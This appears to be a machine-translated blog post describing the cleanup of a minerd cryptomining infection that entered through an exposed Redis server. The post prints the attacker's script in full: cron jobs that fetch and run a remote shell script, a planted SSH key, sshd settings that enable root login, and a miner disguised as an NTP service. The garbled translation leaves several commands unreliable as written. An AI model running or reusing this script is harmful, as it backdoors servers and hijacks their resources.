Redis backdoor leads to mining minerd solution

Reference Link: http://www.cnblogs.com/zhouto/p/5680594.html

The main reason for the invasion of mining minerd is due to the vulnerability of redis;

Redis Security: http://blog.knownsec.com/2015/11/analysis-of-redis-unauthorized-of-expolit/

In the server to perform top query, found that there are minerd processes occupy more than 90% CPU;

Ps-aux|grep minerd #直接kill掉该进程, found more than 10 seconds up again, repeated several times found kill do not drop!!

650) this.width=650; "src="/e/u261/themes/default/images/spacer.gif "style=" Background:url ("/e/u261/lang/zh-cn/ Images/localimage.png ") no-repeat center;border:1px solid #ddd;" alt= "Spacer.gif"/>

Reproduce the reason, in the planning task "crontab-l" found that there is a network side of the execution script operations;

When you find a scheduled task for the process and copy the link, you can download the script with the following script:

Export path= $PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo "*/10 * * * * * CURL-FSSL http://r.chanstring.com/pm.sh?0706 | SH ">/var/spool/cron/root

Mkdir-p/var/spool/cron/crontabs

echo "*/10 * * * * * CURL-FSSL http://r.chanstring.com/pm.sh?0706 | SH ">/var/spool/cron/crontabs/root

if [!-F "/root/.ssh/khk75neoiq"]; Then

Mkdir-p ~/.ssh

Rm-f ~/.ssh/authorized_keys*

echo "Ssh-rsa aaaab3nzac1yc2eaaaadaqabaaabaqczwg/9udowkwwr1zhxb3mtn++94rnitshrewoc9hzfs/f/yw8kghytkviak/ ag1xbkbcbdhxwb/tdrzmzf6p+d+ohv4u9nyoyplj53mzb1jpqvj+wz7yeoww/qpjeoxlkn40y5hflu/xre4dybhqv8q/z/sdcvht5fifn+ tkez3txl6nqhtz405pd3glwfsj1a/kv9rojf6wl4l3wcrdxu+dm8gspjtuuxxu74iseyjc4b0h1bwdqbbxmvqzlxzzr6k9azpom+ Ulhzdzqra3sx1y993qhnytbegn+9izcwlhonlepxbro4mxqktvdqkwo0l4ar7xblady7vrnrvfav root "> ~/.ssh/KHK75NEOiq

echo "Permitrootlogin yes" >>/etc/ssh/sshd_config

echo "Rsaauthentication yes" >>/etc/ssh/sshd_config

echo "Pubkeyauthentication yes" >>/etc/ssh/sshd_config

echo "Authorizedkeysfile Ssh/khk75neoiq" >>/etc/ssh/sshd_config

/etc/init.d/sshd restart

Fi

if [!-F "/ETC/INIT.D/NTP"]; Then

if [!-F "/etc/systemd/system/ntp.service"]; Then

Mkdir-p/opt

Curl-fssl http://r.chanstring.com/v51/lady_ ' uname-m '-o/opt/khk75neoiq33 && chmod +x/opt/khk75neoiq33 && Amp /opt/khk75neoiq33-install

Fi

Fi

/ETC/INIT.D/NTP start

PS auxf|grep-v grep|grep "/usr/bin/cron" |awk ' {print $} ' |xargs kill-9

PS auxf|grep-v grep|grep "/opt/cron" |awk ' {print $} ' |xargs kill-9

Perform crontab-r cleanup Scheduled tasks and restart the Crond service; #此时发现还是没有用, the process is killed and the CPU is automatically restarted; Continue to find the cause

Start from script:

1, Chmod-x Minerd #先将该命令的执行权限去掉, first do not delete, otherwise it will be automatically generated;

2, kill off the process of minerd;

3. Delete khk75neoiq33 and minerd files in the same directory

4, delete /var/spool/cron/root and /var/spool/cron/crontabs/root script files;

5. Remove the appended content from the script in the main configuration file of sshd:

echo "Permitrootlogin yes" >>/etc/ssh/sshd_config

echo "Rsaauthentication yes" >>/etc/ssh/sshd_config

echo "Pubkeyauthentication yes" >>/etc/ssh/sshd_config

echo "Authorizedkeysfile Ssh/khk75neoiq" >>/etc/ssh/sshd_config

After deletion, restart the sshd service;

6, delete ~/.ssh/khk75neoiq;

7. Later in/ etc/init.d/ Discovery can serve NTP, the Trojan has registered an "NTP" service, but also boot up, where NTP is not a time server startup script;

/ etc/init.d/ntp stop #停掉服务, set do not start;

Chkconfig NTP off #删除开机自启;

Delete NTP files after completion;

8. Delete minerd files

At this time in the observation, mining Minerd has no longer restarted, the CPU used to return to normal!

To solve the minerd is not the ultimate goal, mainly to find the root cause of the problem, my server problem in the Redis service, the hacker took advantage of a redis vulnerability to gain access to the server,

See Connection: http://blog.jobbole.com/94518/

Then the virus is injected;

Here are the workarounds and cleanup work

1. Repair the back door of Redis,

• Configure the BIND option to limit the IP that can connect to the Redis server and modify the default port 6379 for Redis.

• Configure Auth, set the password, and the password will be saved in plaintext in the Redis configuration file.

• Configure Rename-command config "Rename_config" so that even if there is unauthorized access, it can make it more difficult for an attacker to use the Config command

• The good news is that the Redis author says "Real user" will be developed to differentiate between normal user and admin privileges, and ordinary users will be banned from running certain commands, such as Conf

2. Open ~/.ssh/authorized_keys, there are known_hosts files, delete the account you do not know

3. Check your user list to see if there are users you don't know to add in. If any, delete it.

Here to carefully analyze this script can solve this mining minerd loopholes, mainly in the fundamental solution, do a good job of redis security!

This article is from the "11009859" blog, please be sure to keep this source http://11019859.blog.51cto.com/11009859/1850771

Redis backdoor leads to mining minerd solution